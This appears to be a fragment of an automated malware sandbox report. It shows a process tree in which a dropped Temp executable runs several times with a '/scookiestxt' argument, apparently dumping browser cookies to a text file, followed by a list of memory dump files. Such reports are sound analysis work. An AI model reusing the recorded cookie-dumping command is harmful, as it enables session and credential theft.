                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                2⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:1992
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                2⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                PID:580
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                2⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                PID:1900

                                                                                                                                                            Network

                                                                                                                                                            MITRE ATT&CK Enterprise v6

                                                                                                                                                            Replay Monitor

                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                            Downloads

                                                                                                                                                            • memory/296-64-0x00000000774F0000-0x00000000774F1000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/856-209-0x00000000013A0000-0x0000000001407000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              412KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/856-208-0x00000000009A0000-0x00000000009E4000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              272KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/956-217-0x0000000007670000-0x0000000007671000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/1072-86-0x00000000045F0000-0x00000000045F1000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/1536-201-0x0000000000400000-0x0000000000983000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              5.5MB

                                                                                                                                                              Download

                                                                                                                                                            • memory/2060-203-0x0000000000400000-0x0000000000418000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              96KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/2168-219-0x0000000002BB0000-0x0000000002CB6000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              1.0MB

                                                                                                                                                              Download

                                                                                                                                                            • memory/2168-211-0x0000000000410000-0x0000000000477000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              412KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/2252-212-0x0000000000A20000-0x0000000000A22000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/2472-213-0x0000000000A60000-0x0000000000AF1000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              580KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/2472-214-0x0000000000400000-0x0000000000A56000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              6.3MB

                                                                                                                                                              Download

                                                                                                                                                            • memory/2596-216-0x0000000000190000-0x00000000001AB000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              108KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/2596-200-0x0000000002530000-0x00000000026CC000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              1.6MB

                                                                                                                                                              Download

                                                                                                                                                            • memory/2596-204-0x0000000000A40000-0x0000000000B2F000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              956KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/2596-215-0x00000000001A0000-0x00000000001A1000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/2688-202-0x0000000000970000-0x0000000000972000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/2788-199-0x000000001B250000-0x000000001B252000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/2828-205-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/2876-105-0x000007FEFC011000-0x000007FEFC013000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/2932-206-0x0000000000250000-0x000000000028A000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              232KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/2932-207-0x0000000001CE0000-0x0000000001D36000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              344KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/3220-227-0x0000000000C40000-0x0000000000C41000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/3464-218-0x000000001A660000-0x000000001A662000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/3636-220-0x0000000000C60000-0x0000000000C61000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/3652-221-0x00000000047B0000-0x00000000047B1000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/3732-222-0x0000000000410000-0x0000000000411000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/3732-225-0x0000000000411000-0x0000000000412000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/3732-226-0x0000000000416000-0x0000000000427000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              68KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/3784-223-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/3804-224-0x00000000048B0000-0x00000000048B1000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/4000-231-0x0000000000400000-0x0000000000463000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              396KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/4028-228-0x0000000000220000-0x000000000025C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              240KB

                                                                                                                                                              Download

                                                                                                                                                            • memory/4028-229-0x0000000000400000-0x0000000000463000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              396KB

                                                                                                                                                              Download